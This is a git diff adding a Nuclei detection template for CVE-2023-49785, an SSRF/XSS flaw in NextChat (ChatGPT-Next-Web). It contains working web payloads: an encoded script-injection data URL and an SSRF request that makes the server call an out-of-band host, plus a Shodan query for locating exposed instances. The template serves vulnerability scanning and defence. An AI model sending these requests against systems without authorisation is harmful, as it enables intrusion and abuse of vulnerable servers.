projectdiscovery · pussycat0x · Mar 12, 2024 · Mar 11, 2024 · Mar 11, 2024 · Mar 12, 2024
diff --git a/http/cves/2023/CVE-2023-49785.yaml b/http/cves/2023/CVE-2023-49785.yaml
@@ -0,0 +1,42 @@
+id: CVE-2023-49785
+
+info:
+  name: ChatGPT-Next-Web - SSRF/XSS
+  author: high
+  severity: critical
+  description: |
+    Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web
+  remediation: |
+    Do not expose to the Internet
+  reference:
+    - https://www.horizon3.ai/attack-research/attack-blogs/nextchat-an-ai-chatbot-that-lets-you-talk-to-anyone-you-want-to/
+    - https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
+    cve-id: CVE-2023-49785
+  metadata:
+    max-request: 1
+    shodan-query: title:NextChat,"ChatGPT Next Web"
+    verified: true
+  tags: cve,cve2023,ssrf,xss,chatgpt,nextchat
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23"
+      - "{{BaseURL}}/api/cors/http:%2f%2fnextchat.{{interactsh-url}}%23"
+
+    matchers-condition: or
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body_1, "<script>alert(document.domain)</script>")
+          - contains(header_1, "text/html")
+        condition: and
+
+      - type: dsl
+        dsl:
+          - contains(header_2,'X-Interactsh-Version')
+          - contains(interactsh_protocol_2,'dns')
+        condition: and